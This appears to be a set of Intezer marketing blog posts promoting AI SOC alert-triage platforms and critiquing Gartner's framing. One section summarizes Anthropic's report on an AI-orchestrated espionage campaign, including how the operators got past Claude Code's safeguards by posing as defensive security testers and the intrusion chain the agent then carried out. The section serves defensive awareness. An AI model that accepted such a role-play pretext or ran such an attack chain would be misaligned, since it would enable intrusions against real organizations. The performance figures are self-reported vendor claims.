Qevlar is an AI-powered investigation co-pilot that enhances analyst workflows by replicating the reasoning and research steps of human investigators. It ingests alerts from various tools and produces structured, evidence-backed reports with clear verdicts, confidence levels, and referenced data sources. Instead of suppressing or prioritizing alerts, Qevlar enriches and interprets them while preserving full analyst oversight. It also offers an automated documentation engine and support for on-prem deployment.

Best for: SOCs experimenting with AI-based triage prototypes.

15. Radiant Security: Best for mid-market enterprises

Radiant Security positions itself as an AI SOC for the mid-market. It differentiates itself with claims of adaptive AI that can learn to handle never-before-seen alerts, as well as a built-in, affordable logging solution that leverages customers’ own archive storage.

[Image: Radiant Security log management]

Best for: Mid-market companies looking to eliminate expensive SIEM costs. 

The future of Agentic AI SOCs

The next evolution of SOC automation goes beyond alert management. In 2026 and beyond, Agentic AI SOCs will not only investigate but also take verified actions: quarantining hosts, isolating sessions, and orchestrating containment based on evidence and policy.

This shift demands trust, explainability, and speed. Enterprises can no longer afford “black-box” AI that delivers vague suggestions. They need platforms capable of forensic reasoning, auditability, and full coverage, exactly what Intezer Forensic AI SOC delivers.

SOC leaders who adopt these systems early will gain measurable efficiency, lower operational risk, and stronger security posture, without expanding headcount.

Final thoughts

AI SOC platforms are transforming how enterprises defend against modern threats.
While each platform on this list has unique strengths, Intezer stands out as the clear enterprise choice for those who demand accuracy, speed, and complete visibility.

See how Fortune 500 SOCs cut through the noise, reduce risk, and reclaim their time with Intezer. 

Book a demo to experience Intezer in action.

Introducing Intezer Forensic AI SOC

Modern SOC teams face real challenges. They are drowning in alert volume, short on experienced analysts, and facing a new generation of AI-driven attacks that operate faster than humans can respond. This combination erodes SOC effectiveness, slows response times, and creates blind spots where real threats hide in low-severity alerts that teams no longer have the time or capacity to investigate.

To meet this moment, Intezer is proud to unveil Intezer Forensic AI SOC, the only AI SOC platform battle-tested inside some of the world’s most targeted and security-mature organizations. Already trusted by more than 150 enterprises, including 15 of the Fortune 500, the platform brings forensic-grade accuracy, full alert coverage, and sub-minute triage to modern security operations.

Why enterprises need a Forensic AI SOC

As attack surfaces grow, many organizations turn to MDR providers for 24/7 alert triage. But MDRs often operate as black boxes with inconsistent quality, high escalation rates, and limited visibility, leaving low-severity alerts unaddressed and creating gaps adversaries can exploit.

Most “AI SOC” tools depend entirely on AI agents for alert triage and investigation. This leads to surface-level results, slower performance, and higher compute usage, limiting their ability to process large alert volumes, especially low-severity signals where threats frequently hide.

The way forward requires an approach that removes SOC bottlenecks while delivering stronger, more reliable security outcomes. 

Why this matters now

The recent Anthropic AI espionage report marks a turning point. Threat actors are now weaponizing AI agents to automate full intrusion chains at machine speed.

These attacks often leave behind subtle, low-severity breadcrumbs that traditional SOCs and MDRs overlook. Without full alert coverage and forensic-grade triage, organizations cannot detect or contain AI-driven campaigns before they escalate.

This is precisely the gap Intezer’s Forensic AI SOC was built to close.

Watch session on how security leaders prepare for the new era of AI-orchestrated cyber attacks.

The Forensic AI SOC advantage

Intezer Forensic AI SOC flips the AI SOC model on its head. Instead of relying solely on AI agents and LLMs, our platform combines AI agents with automated orchestration of deterministic forensic tools to mimic the triage and investigation methods used by elite responders and perform deep, accurate investigations at speed and scale.

Every alert is examined through a forensic lens using Intezer’s battle-tested capabilities, including endpoint forensics, reverse engineering, network artifact analysis, sandboxing, and other proprietary methods. These are paired with the adaptive research and reasoning of multiple LLMs to ensure both depth and flexibility in every investigation.

Intezer Forensic AI delivers:

  • 100% alert coverage, including low-severity alerts often ignored by SOCs and MDRs
  • Fewer than 4% of alerts escalated for human review
  • 98% accurate, consistent verdicts backed by deterministic evidence
  • 1-minute median triage time
  • Predictable, scalable pricing tied to endpoints, not alert volume or costly model usage

Enterprises get both the intelligence of AI and the rigor of forensics, without sacrificing speed, cost, or accuracy.

Proven in the world’s most targeted enterprises

Intezer supports over 150 enterprises, including 15 of the Fortune 500, across verticals such as finance, tech, pharma, critical infrastructure, hospitality, and more. These organizations operate some of the most complex and heavily targeted environments in the world and rely on Intezer to keep their businesses secure.

“Intezer’s AI-driven triage has been transformative for our SOC. It integrates seamlessly with our existing systems and delivers analyst-level investigations at scale, giving our team the confidence that every alert is handled with forensic accuracy.”

Branden Newman, CTO, MGM Resorts International

Built for the growing demands of enterprise SOCs

Enterprise SOCs must respond not only to rising alert volume, but also to increasing business pressure for speed, consistency, and measurable risk reduction. Companies using Intezer Forensic AI SOC enjoy:

  • Lower business risk
    Every alert, including low-severity signals used by modern attackers, is investigated with dramatically shortened MTTR.
  • Predictable, cost-efficient pricing
    Pricing aligned to endpoints avoids the unpredictable costs of LLM-heavy AI SOCs.
  • Instant time to value
    Hundreds of integrations enable rapid deployment and immediate time-to-value without training models on customer data.
  • Doing more with less
    Reduce MDR dependence and automate analyst workloads to optimize budgets and expand SOC output.

Built by security experts, for security experts

Intezer was founded and shaped by world-class SecOps leaders, security researchers and incident responders who have spent their careers defending some of the most targeted organizations and building foundational cybersecurity technologies.

Our leadership team includes pioneers who helped create and scale major cybersecurity companies. This firsthand experience responding to advanced threats, operating high-pressure SOC environments, and building products used by thousands of security teams worldwide directly informs how Intezer designs its technology.

We understand what analysts need: speed, accuracy, transparency, and trustworthy automation. We’ve lived those challenges ourselves.

Intezer Forensic AI SOC reflects that operational DNA with a platform built not by generic AI engineers, but by practitioners who have spent years reverse engineering malware, hunting nation-state adversaries, leading global IR engagements, and building tools that analysts rely on every day.

Join the future of the SOC, today!

The SOC is entering a new era. Machine-scaled attacks demand an approach grounded in both forensic rigor and adaptive AI, enabling consistent, accurate investigations to defend the enterprise.

To explore how Intezer’s Forensic AI SOC can strengthen your operations, schedule a conversation with a product expert today!

Why the “AI SOC Agent” narrative misses the point: The future is about security outcomes, not workflow augmentation

tl;dr Greater productivity ≠ greater security outcomes. Kinda like how being able to accelerate from 0-60 MPH doesn’t help when the ice is cracking under your wheels.

And now, the full version.

AI SOC shouldn’t just “augment workflows”; that’s a productivity-locked perspective. The goal, and the delivery capability that exists right now, is full-scale enterprise triage of 100% of alerts with forensically accurate verdicts. That looks like streamlined triage, explainable verdicts, measurable accuracy, and operational resilience. There’s already an AI SOC platform that has operationalized what Gartner calls “emerging”.

While recent Gartner reports on “AI SOC Agents” and “SecOps Workflow Augmentation” succeed in elevating the conversation, they also reveal how incomplete that conversation still is. Both documents frame AI in the SOC as a promising but premature experiment, a toolset meant to make analysts more productive, not organizations more secure. That framing misses the point. AI isn’t about automation for automation’s sake; it’s about turning expert knowledge, data, context, and expertise into repeatable, scalable decision-making that covers every alert with confidence and context.

The bias in today’s AI SOC conversation

Gartner’s reports argue that AI SOC agents should be treated as “workflow augmentation tools” to reduce analyst fatigue and improve response efficiency. They recommend cautious adoption, structured pilots, and human-in-the-loop validation. Pragmatic? When LLMs are relied upon solely, sure. But the underlying assumption that enterprise-proven AI is not yet mature enough to deliver reliable outcomes is outdated.

In practice, this mindset anchors the market in productivity metrics, not security performance. It evaluates how efficiently teams work, not how effectively they defend. The focus stays on “mean time to detect” and “mean time to respond,” rather than the more critical questions:

  • Are ALL alerts being triaged?
  • Are verdicts, not just investigations, consistently accurate?
  • Are we actually reducing risk, not just improving the process?
  • Are alerts triaged in seconds & minutes for true containment & response?

That’s where the emerging class of true AI SOC platforms breaks away from the Gartner lens.

Workflow augmentation isn’t security

The distinction matters. Augmentation is an operational improvement; outcomes are a security transformation. Most vendors today build tools that accelerate investigation but still depend on human oversight for every meaningful decision. Those are SOAR 2.0 platforms: automation-centric, workflow-obsessed, and still fundamentally enrichment, not triage.

A true AI SOC, by contrast, triages every alert across the stack autonomously, determines a verdict with auditable reasoning, and escalates only when necessary, typically less than four percent of the time. This isn’t a co-pilot; it’s a teammate that already performs at the level of a seasoned analyst and identifies the needles without the haystack. For the SOC analysts who get to focus on real alerts, that is transformative.

Security outcome execution is the critical requirement for any true AI SOC:

  • Resolve millions of alerts monthly across distributed environments with <4% escalation rates.
  • Deliver verdict accuracy above 97.7% through hybrid deterministic and AI reasoning.
  • Provide explainable decisions, validated by periodic human review and forensic evidence.
  • Uncover real threats in seconds & minutes, not hours.

This isn’t augmentation; it’s execution.

Read more about properly framing the AI SOC conversation.

The “emerging” technology that’s already operational

Gartner describes AI SOC agents as an “emerging technology” that promises to evolve beyond playbook-driven automation. The irony is that enterprise SOCs are already running on these systems today. Fortune 10 environments and thousands of organizations worldwide are triaging every single alert, not just the critical and high-severity ones, through AI that emulates human reasoning at scale.

These systems don’t “pilot” AI; they operationalize it. They deliver 24/7 SOC capability, instant triage, and consistent decision-making grounded in explainable logic, not black-box inference. They prove that an AI SOC is no longer a future-state concept. It’s production-grade infrastructure that’s rewriting what operational maturity means, and has been for years now.

The difference between Gartner’s caution and what’s happening in practice is simple: proof.

Measuring what actually matters

The reports fixate on efficiency metrics (MTTD, MTTR, analyst satisfaction), but those only tell half the story, especially for antiquated SOCs. The next generation of AI SOCs defines success through security outcome metrics (a toy scoring sketch follows this list), including:

  1. Total alert coverage – Every alert analyzed, across all severities and sources.
  2. Verdict accuracy – The supermajority of decisions must be right, consistently and explainably.
  3. Escalation rate – Only the rarest cases should reach human review.
  4. Explainability – Every verdict is clearly backed by evidence: memory scans, forensic traces, and contextual reasoning.
  5. Feedback velocity – Every corrected verdict feeds back into the detection logic, closing the learning loop.
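
As noted above, here is a toy scoring sketch for these outcome metrics. The verdict records are fabricated examples; in practice they would come from an AI SOC platform's audit log.

```python
# Compute coverage, verdict accuracy, and escalation rate from a (fabricated)
# set of investigation records.
verdicts = [
    {"ai": "malicious", "truth": "malicious", "escalated": True},
    {"ai": "benign",    "truth": "benign",    "escalated": False},
    {"ai": "benign",    "truth": "benign",    "escalated": False},
    {"ai": "malicious", "truth": "benign",    "escalated": True},
]
total_alerts_received = 4   # assume every alert was analyzed

coverage = len(verdicts) / total_alerts_received
accuracy = sum(v["ai"] == v["truth"] for v in verdicts) / len(verdicts)
escalation_rate = sum(v["escalated"] for v in verdicts) / len(verdicts)

print(f"Coverage:         {coverage:.0%}")
print(f"Verdict accuracy: {accuracy:.0%}")
print(f"Escalation rate:  {escalation_rate:.0%}")
```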

When you measure what truly matters (accuracy, coverage, trust), the difference between AI that “helps” and AI that defends becomes obvious.

Why “AI SOC Agent” ≠ “AI SOC Platform”

The reports conflate two very different things. An “AI SOC agent” is a single use case, an assistant. An “AI SOC platform” is a full operating model: triage, investigation, and response fused into a continuous feedback loop back to detection engineering. One optimizes efficiency; the other drives security transformation.

That’s the real inflection point the industry is standing at. SOCs that treat AI as a productivity booster will get marginal gains, which is still a good thing for the industry. SOCs that rebuild around AI as a core operating principle will see exponential gains and real risk reduction.

In other words: this isn’t about speeding up analysts; it’s about scaling their expertise across the entire alert surface.

From AI promise to proof

The challenge now isn’t technology; it’s perception. The AI SOC has already proven it can outperform legacy models built on manual triage and brittle playbooks. It has shown that full alert coverage, explainable verdicts, and continuous learning can coexist with human oversight and compliance.

The industry doesn’t need another year of pilots to “validate the promise.” It needs a new standard of performance.

The next evolution of the SOC will be measured not by how well it augments workflows, but by how confidently it can:

  • Detect and triage every signal.
  • Deliver verdicts with explainable evidence.
  • Quantify accuracy in measurable, repeatable terms.
  • Strengthen analyst trust through transparency.

That’s the AI SOC outcome model, here today.

Final thoughts

Gartner’s perspective is valuable for shaping the taxonomy of an emerging market. But the reality on the ground has already overtaken the research. The world doesn’t need another whitepaper on “potential.” It needs proof of performance, and it exists.

The future SOC isn’t augmented.

It’s autonomous, accurate, and accountable for the strategic security outcomes that CISOs and leaders require, whether now or in the next few months as executive leadership pushes to operationalize AI.

The world’s largest enterprises today already benefit from the real market-defining traits of a forensic AI SOC.

To learn more about Intezer’s Forensic AI SOC platform, schedule a demo today!

What the Anthropic report on AI espionage means for security leaders

1. Introduction: The Benchmark, Not the Hype

For a while now, the security community has been aware that threat actors are using AI. We’ve seen evidence of it for everything from generating phishing content to optimizing malware. The recent report from Anthropic on an “AI-orchestrated cyber espionage campaign”, however, marks a significant milestone.

This is the first time we have a public, detailed report of a campaign where AI was used at this scale and with this level of sophistication, moving the threat from a collection of AI-assisted tasks to a largely autonomous, orchestrated operation.

This report is a significant new benchmark for our industry. It’s not a reason to panic – it’s a reason to prepare. It provides the first detailed case study of a state-sponsored attack with three critical distinctions:

  • It was “agentic”: This wasn’t just an attacker using AI for help. This was an AI system executing 80-90% of the attack largely on its own.
  • It targeted high-value entities: The campaign was aimed at approximately 30 major technology corporations, financial institutions, and government agencies.
  • It had successful intrusions: Anthropic confirmed the campaign resulted in “a handful of successful intrusions” and obtained access to “confirmed high-value targets for intelligence collection”.

Together, these distinctions show why this case matters. A high-level, autonomous, and successful AI-driven attack is no longer a future theory. It is a documented, current-day reality.

2. What Actually Happened: A Summary of the Attack

For those who haven’t read the full report (or the summary blog post), here are the key facts.

The attack (designated GTG-1002) was a “highly sophisticated cyber espionage operation” detected in mid-September 2025.

  • AI Autonomy: The attacker used Anthropic’s Claude Code as an autonomous agent, which independently executed 80-90% of all tactical work.
  • Human Role: Human operators acted as “strategic supervisors”. They set the initial targets and authorized critical decisions, like escalating to active exploitation or approving final data exfiltration.
  • Bypassing Safeguards: The operators bypassed AI safety controls using simple “social engineering”. The report notes, “The key was role-play: the human operators claimed that they were employees of legitimate cybersecurity firms and convinced Claude that it was being used in defensive cybersecurity testing”.
  • Full Lifecycle: The AI autonomously executed the entire attack chain: reconnaissance, vulnerability discovery, exploitation, lateral movement, credential harvesting, and data collection.
  • Timeline: After detecting the activity, Anthropic’s team launched an investigation, banned the accounts, and notified partners and affected entities over the “following ten days”.

Source: https://www.anthropic.com/news/disrupting-AI-espionage

3. What Was Not New (And Why It Matters)

To have a credible discussion, we must also look at what wasn’t new. This attack wasn’t about secret, magical weapons.

The report is clear that the attack’s sophistication came from orchestration, not novelty.

  • No Zero-Days: The report does not mention the use of novel zero-day exploits.
  • Commodity Tools: The report states, “The operational infrastructure relied overwhelmingly on open source penetration testing tools rather than custom malware development”.

This matters because defenders often look for new exploit types or malware indicators. But the shift here is operational, not technical. The attackers didn’t invent a new weapon; they built a far more effective way to use the ones we already know.

4. The New Reality: Why This Is an Evolving Threat

So, if the tools aren’t new, what is? The execution model. And we must assume this new model is here to stay.

This new attack method is a natural evolution of technology. We should not expect it to be “stopped” at the source for two main reasons:

  1. Commercial Safeguards are Limited: AI vendors like Anthropic are building strong safety controls – it’s how this was detected in the first place. But as the report notes, malicious actors are continually trying to find ways around them. No vendor can be expected to block 100% of all malicious activity.
  2. The Open-Source Factor: This is the larger trend. Attackers don’t need to use a commercial, monitored service. With powerful open-source AI models and orchestration frameworks – such as LLaMA, self-hosted inference stacks, and LangChain/LangGraph agents – attackers can build private AI systems on their own infrastructure. This leaves no vendor in the middle to monitor or prevent the abuse.

The attack surface is not necessarily growing, but the attacker’s execution engine is accelerating.

5. Detection: Key Patterns to Hunt For

While the techniques were familiar, their execution creates a different kind of detection challenge. An AI-driven attack doesn’t generate one “smoking gun” alert, like a unique malware hash or a known-bad IP. Instead, it generates a storm of low-fidelity signals. The key is to hunt for the patterns within this noise (a minimal rate-based hunting sketch follows the list):

  • Anomalous Request Volumes: The AI operated at “physically impossible request rates”; “peak activity included thousands of requests, representing sustained request rates of multiple operations per second”. This is a classic low-fidelity, high-volume signal that is often dismissed as noise.
  • Commodity and Open-Source Penetration Testing Tools: The attack utilized a combination of “standard security utilities” and “open source penetration testing tools”.
  • Traffic from Browser Automation: The report explicitly calls out “Browser automation for web application reconnaissance” to “systematically catalog target infrastructure” and “analyze authentication mechanisms”.
  • Automated Stolen Credential Testing: The AI didn’t just test one password; it “systematically tested authentication against internal APIs, database systems, container registries, and logging infrastructure”. This automated, broad, and rapid testing looks very different from a human’s manual attempts.
  • Audit for Unauthorized Account Creation: This is a critical, high-confidence post-exploitation signal. In one successful compromise, the AI’s autonomous actions included the creation of a “persistent backdoor user”.
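
As referenced above, here is a minimal rate-based hunting sketch for the first pattern: flag any source that sustains a request rate no human operator could produce. The log shape (timestamp, source) and the thresholds are assumptions to tune against your own telemetry.

```python
# Flag sources sustaining "machine speed" request rates over a sliding window.
from collections import defaultdict, deque

WINDOW_SEC = 60    # sliding-window length (assumption)
THRESHOLD = 2.0    # sustained requests/sec beyond plausible human activity

def find_machine_speed_sources(events):
    """events: iterable of (timestamp_sec, source) tuples, sorted by time."""
    windows = defaultdict(deque)
    flagged = set()
    for ts, src in events:
        window = windows[src]
        window.append(ts)
        while window and window[0] < ts - WINDOW_SEC:
            window.popleft()              # drop events outside the window
        if len(window) / WINDOW_SEC > THRESHOLD:
            flagged.add(src)
    return flagged

# Fabricated example: 10.0.0.5 fires 5 requests/sec; 10.0.0.9 is human-paced.
events = sorted([(t * 0.2, "10.0.0.5") for t in range(300)]
                + [(t * 20.0, "10.0.0.9") for t in range(10)])
print(find_machine_speed_sources(events))   # -> {'10.0.0.5'}
```

A production version would read from your SIEM instead of a list, but the core idea holds: the signal is not any single event, it is the rate and breadth of many individually boring ones.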

6. The Defender’s Challenge: A Flood of Low-Fidelity Noise

The detection patterns listed above create the central challenge of defending against AI-orchestrated attacks. The problem isn’t just alert volume, it’s that these attacks generate a massive volume of low-fidelity alerts.

This new execution model creates critical blind spots:

  1. The Volume Blind Spot: The AI’s automated nature creates a flood of low-confidence alerts. No human-only SOC can manually triage this volume.
  2. The Temporal (Speed) Blind Spot: A human-led intrusion might take days or weeks. Here, the AI compressed a full database extraction – from authentication to data parsing – into just 2-6 hours. Our human-based detection and response loops are often too slow to keep up.
  3. The Context Blind Spot: The AI’s real power is connecting many small, seemingly unrelated signals (a scan, a login failure, a data query) into a single, coherent attack chain. A human analyst, looking at these alerts one by one, would likely miss the larger pattern.

7. The Importance of Autonomous Triage and Investigation

When the attack is autonomous, the defense must also have autonomous capabilities.

We cannot hire our way out of this speed and scale problem. The security operations model must shift. The goal of autonomous triage is not just to add context, but to handle the entire investigation process for every single alert, especially the thousands of low-severity signals that AI-driven attacks create.

An autonomous system can automatically investigate these signals at machine speed, determine which ones are irrelevant noise, and suppress them.

This is the true value: the system escalates only the high-confidence, confirmed incidents that actually matter. This frees your human analysts from chasing noise and allows them to focus on real, complex threats.

This is exactly the type of challenge autonomous triage systems like the one we’ve built at Intezer were designed to solve. As Anthropic’s own report concludes, “Security teams should experiment with applying AI for defense in areas like SOC automation, threat detection… and incident response”.

8. Evolving Your Offensive Security Program

To defend against this threat, we must be able to test our defenses against it. All offensive security activities (internal red teams, external penetration tests, and attack simulations) must evolve.

It is no longer enough for offensive security teams to manually simulate attacks. To truly test your defenses, your red teams or external pentesters must adopt agentic AI frameworks themselves.

The new mandate is to simulate the speed, scale, and orchestration of an AI-driven attack, similar to the one detailed in the Anthropic report. Only then can you validate whether your defensive systems and automated processes can withstand this new class of automated onslaught. Naturally, all such simulations must be done safely and ethically to prevent any real-world risk.

9. Conclusion: When the Threat Model Changes, Our Processes Must, Too.

The Anthropic report doesn’t introduce a new magic exploit. It introduces a new execution model that we now need to design our defenses around.

Let’s summarize the key, practical takeaways:

  • AI-orchestrated attacks are a proven, documented reality.
  • The primary threat is speed and scale, which is designed to overwhelm manual security processes.
  • Security leaders must prioritize automating investigation and triage to suppress the noise and escalate what matters.
  • We must evolve offensive security testing to simulate this new class of autonomous threat.

This report is a clear signal. The threat model has officially changed. Your security architecture, processes, and playbooks must change with it. The same applies if you rely on an MSSP: verify that they’re evolving their detection and triage capabilities for this new model. This shift isn’t hype; it’s a practical change in execution speed. With the right adjustments and automation, defenders can meet this challenge.

To learn more, you can read the Anthropic blog post here and the full technical report here.

Properly framing the AI SOC conversation 

Gartner’s recent Innovation Insight: AI SOC Agents report is an encouraging signal that the concept of an “AI-powered SOC” has reached mainstream awareness. The report recognizes the potential of AI technologies to transform how security operations centers function, especially in augmenting analysts through automation and intelligent workflows.

Yet, while Gartner’s analysis succeeds in capturing the momentum of this space, it falls short in clarifying how and where AI actually fits within the security operations stack. By treating “AI SOC” as a monolithic, undifferentiated category, the report overlooks the crucial distinctions between detection, triage and response, each of which requires a very different kind of AI capability and delivers very different value.

A closer look at Gartner’s analysis 

Gartner’s report provides a valuable overview of how AI SOC can assist with detection, alert investigation, and even response recommendation. We wholeheartedly agree with Gartner’s advice that CISOs should evaluate which security activities are “volumetric, troublesome, or low-performing, and which would benefit the most from augmentation with the application of AI”. However, presenting all of the AI SOC functions (and vendors) as part of a single undifferentiated security ecosystem can be confusing.

This broad framing misses the fact that an AI model designed to improve SIEM detection logic operates on entirely different data, architecture, and feedback loops than one built to support analyst decision-making or response automation. The result is a flattening of a nuanced market into one monolithic category, useful for taxonomy, but not for decision-making.

For CISOs, this lack of segmentation makes it hard to answer the key strategic question: Where should we apply AI first to get tangible operational value?

By contrast, our view is that organizations should start by identifying which part of their operations needs augmentation most, then evaluate AI solutions purpose-built for that domain.

A clearer way to frame the AI SOC market

To understand where AI truly fits in and how it can deliver measurable outcomes, it helps to zoom out and look at the broader security operations stack. As we described in a previous blog post, “Making sense of the AI SOC market”, we see three main layers where AI can add value:

Detection (SIEM, XDR)

The first layer converts raw telemetry into actionable alerts. Here, AI can strengthen correlation logic, improve detection models, and reduce false positives. This is largely about data pattern recognition and automation of repetitive analysis.

Triage and Investigation (SOC / MDR)

The middle layer is where human analysts determine which alerts are real incidents worth escalating. This is where AI can truly emulate analyst reasoning, gathering context, cross-referencing intelligence, and presenting likely root causes. Done well, AI here acts as a co-analyst, not a replacement.

Response and Case Management (SOAR)

The final layer coordinates remediation and manages incident workflows. AI can accelerate playbook creation, automate routine case handling, and improve overall response time through dynamic decision logic.

Each layer offers opportunities for AI—but they are fundamentally different problems to solve. When vendors use the term “AI SOC” without specifying which layer they’re addressing, it creates confusion and unrealistic expectations.

A more practical evaluation framework

To move the conversation forward, we recommend a more structured approach to evaluating AI SOC solutions.

Step 1: Identify your target layer

Ask: which layer of our operations needs the most improvement? Is it detection (SIEM/XDR/cloud), triage (SOC/MDR), or response (SOAR)?

This helps narrow the field to the right class of solutions rather than chasing the broad “AI SOC” label.

Step 2: Define measurable outcomes

Especially for alert triage and investigation (which is usually handled by an internal SOC or external MDR), establish metrics to compare performance, such as:

  • Reduction in mean time to detect (MTTD)
  • Noise reduction rate
  • Scale of alert coverage
  • Consistency across SOC shifts or analyst tiers
  • Triage accuracy

These metrics allow organizations to compare vendors on tangible outcomes, not vague AI promises.

Step 3: Evaluate transparency and integration

An effective AI SOC solution should clearly explain its reasoning, integrate easily with your existing tools, and allow human oversight. The goal is augmentation, not opacity.

Read more about why the “AI SOC agent” narrative misses the point.

The way forward

Gartner deserves credit for bringing visibility to an emerging market, but their analysis underscores how early and fluid this space still is. The future of the AI SOC isn’t one product category. It’s a set of AI capabilities applied intelligently across the detection–triage–response continuum.

Organizations that treat AI as a modular capability rather than a monolithic product will see the most success. The key is knowing your operational priorities and matching them to the layer where AI can have the greatest impact.

Conclusion

AI is not a magic “SOC-in-a-box.” It’s a set of technologies that, when properly targeted, can transform specific parts of security operations. Gartner’s latest report captures the enthusiasm, but not yet the structure, of this market.

At Intezer, we believe the path forward starts with clarity: understanding the distinct layers of the SOC, the role AI plays in each, and the outcomes that matter most. Only then can organizations cut through the noise and choose the right AI SOC partner for their needs.

Explore how Intezer delivers complete peace of mind for your security operations! 

Making sense of the AI SOC market

There’s been an explosion of buzz around the AI SOC market. More than 40 vendors are now claiming to do something in this space, but as with many emerging technology categories, the result is a lot of excitement and a lot of confusion.

In this video and in the article below it, I want to provide some clarity. What exactly is “AI SOC”? Where did this category come from? And how can security teams cut through the noise to find real value?

The origins of the AI SOC: An old problem meets new tech

The rise of the AI SOC stems from two converging forces: a very old problem and a very new technology.

The old problem is the persistent talent shortage in cybersecurity combined with the overwhelming volume of security alerts. Security teams have been drowning in these alerts for years, struggling to keep up with investigation and response.

The new technology is AI, especially large language models (LLMs) and adjacent innovations, which open up an opportunity to finally address that shortage by automating some of the human decision-making process.

The 3 layers of security operations

To understand where AI fits in and how it can help, let’s zoom out and look at the broader security operations stack. 

There are three main layers:

Detection (SIEM, XDR) is the first layer, which handles converting raw logs and other telemetry data into actionable alerts.

Triage and investigation (SOC) is the middle layer where human analysts determine which alerts are real incidents worth escalating.

Response and case management (SOAR) is the final layer that manages incident remediation with case assignment, and workflow automation.

Each layer presents opportunities for AI. For example, in SIEM/XDR, AI can improve detection logic and reduce false positives. For SOC, AI can simulate the investigative reasoning of human analysts. And when applied to SOAR, AI can accelerate workflow creation and automate routine case handling.

In each of these areas, vendors are loosely using the term AI SOC to describe what they are doing. That is why it’s important to know what problem you are trying to solve and which “AI SOC” solution is appropriate for you.

Read about how AI is redefining detection engineering.

What AI SOC usually means

All that said, when people refer to AI SOC, they’re usually talking about that middle layer. The part focused on automated alert triage, investigation, and escalation.

That’s where Intezer focuses: providing 24/7 managed alert triage, investigation, and response powered by a decade of deep forensic analysis tooling combined with flexible and adaptable LLMs.

Our system automatically investigates alerts, surfaces only what truly requires attention, and escalates no more than 4% of alerts to human analysts.

This is where the market’s energy and customer need are currently concentrated. Teams want to scale their response capabilities without adding headcount, and AI SOCs make that possible.

How to evaluate AI SOC vendors

With so many vendors entering the field, it’s important to evaluate them based on clear, measurable criteria. Some of the key metrics that our customers and prospects tell me they consider include:

  • Accuracy: How precise are the AI-driven investigations?
  • Speed: How quickly can alerts be triaged?
  • Scale and coverage: Can the system handle all your alerts in a timely fashion?
  • Noise reduction: What percentage of alerts still require human review?
  • Context and transparency: Can you understand how the AI reached its conclusions, or is it a black box?

For more on this, see our guide to evaluate AI SOC tools (with questions to ask vendors).

The road ahead

AI SOC is one of the most exciting and fast-evolving categories in cybersecurity. It’s also one of the messiest, but that’s often a sign of real innovation happening.

For years, the industry has been searching for a way to truly solve the alert overload and talent shortage problem. With the arrival of AI-driven investigation technology, we’re finally seeing that vision come to life.

A recent SACR market analysis report examined these metrics across leading AI SOC vendors, which can be very helpful for evaluating which solution is right for you. And I definitely recommend reading about Intezer in the report 🙂.

At Intezer, we’re proud to help security teams reduce noise, focus on real threats, and scale their operations intelligently.

If you’re exploring this space, we’d love to be your partner in building a smarter SOC.
